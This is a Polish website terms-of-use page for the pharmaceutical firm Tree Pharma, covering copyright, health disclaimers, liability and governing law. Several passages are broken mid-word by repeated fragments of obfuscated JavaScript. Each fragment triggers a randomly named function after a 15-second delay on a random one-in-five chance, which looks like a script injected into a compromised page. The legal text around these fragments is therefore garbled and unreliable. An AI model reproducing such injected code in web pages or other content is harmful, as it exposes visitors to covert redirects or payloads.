czysta
odporność

Niniejszy Serwis został przygotowany przez Tree Pharma Sp. z o.o. z siedzibą w Poznaniu przy ul. Strzeszyńskiej 33, jako serwis informacyjny dla odbiorców w Polsce.
Korzystania z serwisu internetowego www.treepharma.pl jest równoznaczne z wyrażeniem zgody na przedstawione na tej stronie warunki, bez prawa zgłaszania jakichkolwiek zastrzeżeń co do ich treści. Jeśli nie akceptują Państwo tych warunków, nie jesteście Państwo uprawnieni do korzystania z serwisu internetowego. Podczas przetwarzania danych zobowiązujemy się do przestrzegania ogólnie przyjętych zasad ochrony tajemnicy oraz standom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andardów bezpieczeństwa i poufności.

 1. Wszelkie zawarte na stronie treści, w tym oznaczenia produktów i nazwy handom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andlowe stanowią własność intelektualną Tree Pharma Sp. z o.o. i zgodnie z prawem podlegają ochronie. W związku z powyższym dostępu do Serwisu nie należy interpretować jako przyznania jakiejkolwiek licencji lub prawa do korzystania ze znaków występujących w Serwisie bez uprzedniej pisemnej zgody Tree Pharma Sp. z o.o..
  Jakiekolwiek drukowanie, kopiowanie i inne rodzaje wykorzystania mogą odbywać się jedynie i wyłącznie w celach niekomercyjnych i dla użytku własnego.
 2. Należy pamiętać, iż wszystkie informacje dotyczące zdrowia, prezentowane w Serwisie publikowane są w celach informacyjnych i edukacyjnych i nie mogą zastępować konsultacji z lekarzem, ani być traktowane jako forma doradztwa, konsultacji czy rekomendacji. . Jakiekolwiek wykorzystywanie lub stosowanie preparatów i środków wymienionych w niniejszym serwisie odbywać się może jedynie po wcześniejszym zapoznaniu się z informacją dołączoną do każdego sprzedawanego preparatu.
 3. Informacje zawarte w Serwisie zostały opracowane przez Tree Pharma Sp. z o.o. w dobrej wierze i na podstawie źródeł uważanych za wiarygodne. Informacje, dokumenty, produkty i usługi zawarte lub opisane w Serwisie mogą być przedstawione lub udostępnione w formie skróconej, niepełnej lub być przedawnione. Autorzy, konsultanci jak i wydawca Serwisu nie ponoszą odpowiedzialności za dokładność i kompletność informacji umieszczonych na stronach Serwisu. Wszystkie osoby wykorzystujące opublikowane w Serwisie treści robią to na własną odpowiedzialność i ryzyko. W wypadku uznania przez Państwa konieczności ich weryfikacji, prosimy o kontakt pod numerem telefonu 61 65 67 222 lub poprzez wysłanie e-mail’a na biuro@treepharma.pl
 4. Wszelkie komentarze, sugestie lub uwagi nawiązujące do informacji zawartych w niniejszym Serwisie, przekazane przez użytkownika nie będą traktowane jako poufne.
  Tree Pharma Sp. z o.o. nabywa nieodpłatne prawo do powielania, wykorzystania oraz używania i dystrybuowania takich informacji bez żadnych ograniczeń. Wszelkie pomysły, know-how oraz technologie zawarte w takich informacjach mogą zostać wykorzystane przez Tree Pharma Sp. z o.o. w dowolny sposób, w szczególności w produkcji, dystrybucji, marketingu.
 5. Tree Pharma Sp. z o.o. informuje, że serwisy i strony internetowe, do których odesłania znajdują się w niniejszym serwisie, o ile nie zawierają takiej informacji, nie zostały przygotowane przez Tree Pharma Sp. z o.o..
  Tree Pharma Sp. z o.o. nie ponosi żadnej odpowiedzialności za informacje, opinie i materiały tam zawarte. Użytkownik decydując się na skorzystanie z tych linków, aby uzyskać dostęp do stron osób trzecich czyni to wyłącznie na własną odpowiedzialność.
 6. Tree Pharma Sp. z o.o. nie ponosi odpowiedzialności za jakiekolwiek szkody wyrządzone przez Użytkowników w wyniku działań związanych z dostępem, użyciem lub pobieraniem materiałów z Serwisu i ich dalszą eksploatacją.
 7. Niedozwolone jest włączanie niniejszego Serwisu do innych witryn lub części witryn należących do innych podmiotów. Podłączenie on-line lub inny sposób włączania części Serwisu do witryn należących do innych podmiotów również są zabronione.
 8. Informacje zamieszczone w Serwisie nie stanowią oferty w rozumieniu przepisów Kodeksu Cywilnego i nie mogą stanowić podstawy do sprzedaży jakichkolwiek produktów. Informacje zamieszczone w Serwisie mogą być zmienione bez uprzedzenia w każdym czasie.
 9. Korzystanie z Serwisu podlega prawodawstwu polskiemu. Jakiekolwiek działania prawne odnoszące się do dostępu, użycia lub pobierania materiałów z Serwisu i ich dalszej eksploatacji będą rozstrzygane przez organ właściwy dla siedziby Tree Pharma Sp. z o.o..